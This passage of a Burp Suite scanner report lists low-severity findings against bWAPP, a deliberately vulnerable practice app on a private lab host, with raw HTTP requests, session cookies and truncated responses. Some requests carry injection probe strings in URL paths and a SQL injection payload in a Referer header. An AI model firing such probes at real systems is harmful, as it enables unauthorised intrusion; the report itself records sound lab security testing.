    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:28 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54213

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.15. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:36 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54125

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.16. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:50 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54037

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.17. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:40:52 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 53949

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.18. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/admin/phpinfo.php/
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; movie_genre=horror

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 06:43:07 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Content-Length: 53861
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.19. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/php_cgi.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 03:06:03 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 54855

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
    <html><head>
    <style type="text/css">
    body {background-color: #ffffff; color: #000000;}
    body, td, th, h1, h
    ...[SNIP]...
    18.20. http://192.168.52.147/bWAPP/aim.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/aim.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/aim.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/http_response_splitting.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:13 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Connection: close
    Content-Type: text/html
    Content-Length: 9959

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon" />

    <title>bWAPP -
    ...[SNIP]...
    18.21. http://192.168.52.147/bWAPP/ba_captcha_bypass.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_captcha_bypass.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_captcha_bypass.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13484

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.22. http://192.168.52.147/bWAPP/ba_forgotten.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_forgotten.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_forgotten.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12977

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.23. http://192.168.52.147/bWAPP/ba_insecure_login.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_insecure_login.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: ba_insecure_login_2.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.24. http://192.168.52.147/bWAPP/ba_insecure_login_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_insecure_login_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_insecure_login_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_insecure_login.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 15303

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.25. http://192.168.52.147/bWAPP/ba_pwd_attacks.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_pwd_attacks.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_pwd_attacks.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0

    Response 1

    HTTP/1.1 302 Found
    Date: Fri, 09 Mar 2018 02:57:14 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: ba_pwd_attacks_2.php
    Content-Length: 0
    Connection: close
    Content-Type: text/html

    18.26. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_pwd_attacks_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_pwd_attacks_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/ba_pwd_attacks.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13504

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.27. http://192.168.52.147/bWAPP/ba_weak_pwd.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/ba_weak_pwd.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/ba_weak_pwd.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/sqli_11.php?title=ben%27+OR+%271%27+%3D+%271--&action=search
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:58:20 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13329

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.28. http://192.168.52.147/bWAPP/bof_1.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_1.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/bof_1.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13166

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.29. http://192.168.52.147/bWAPP/bof_2.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/bof_2.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/bof_2.php HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/aim.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:25 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 12971

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Architects
    ...[SNIP]...
    18.30. http://192.168.52.147/bWAPP/captcha_box.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/captcha_box.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/captcha_box.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/manual_interv.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:58:59 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Content-Length: 404
    Connection: close
    Content-Type: text/html

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <title>bWAPP - CAPTCHA box</title>

    </head>

    <body>

    <table>

    <tr>


    ...[SNIP]...
    18.31. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/cgi-bin/shellshock.sh

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/cgi-bin/shellshock.sh HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://192.168.52.147/bWAPP/shellshock.php
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=1; secret=QW55IGJ1Z3M%2F; admin=0; top_security_nossl=6cb83e5b3360cfd5f862d944720c26f802de86780e94773115b2f8b579e3f317

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:57:26 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    Connection: close
    Content-Type: text/html
    Content-Length: 288

    <!DOCTYPE html>
    <html>
    <head>
    <link rel=stylesheet type=text/css href=../stylesheets/stylesheet.css />
    <title>bWAPP - Shellshock Vulnerability (CGI)</title>
    </head>
    <body>
    <div id=frame>
    <p><i>
    This i
    ...[SNIP]...
    18.32. http://192.168.52.147/bWAPP/clickjacking.php
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/clickjacking.php

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    GET /bWAPP/clickjacking.php HTTP/1.1
    Accept: text/html, application/xhtml+xml, image/jxr, */*
    Referer: http://192.168.52.147/bWAPP/http_verb_tampering.php
    Accept-Language: en-US,en;q=0.7,ja;q=0.3
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Accept-Encoding: gzip, deflate
    Host: 192.168.52.147
    Pragma: no-cache
    Cookie: PHPSESSID=b586912c9cb6a597a60ae6d71cd6a882; security_level=0; secret=QW55IGJ1Z3M%2F
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Date: Fri, 09 Mar 2018 02:55:55 GMT
    Server: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
    X-Powered-By: PHP/5.2.4-2ubuntu5
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Connection: close
    Content-Type: text/html
    Content-Length: 13401

    <!DOCTYPE html>
    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!--<link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?famil
    ...[SNIP]...
    18.33. http://192.168.52.147/bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c
    Previous  Next

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.52.147
    Path:   /bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c

    Note: This issue was generated by the Burp extension: Additional Scanner Checks.

    Request 1

    POST /bWAPP/clickjacking.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c HTTP/1.1
    Host: 192.168.52.147
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
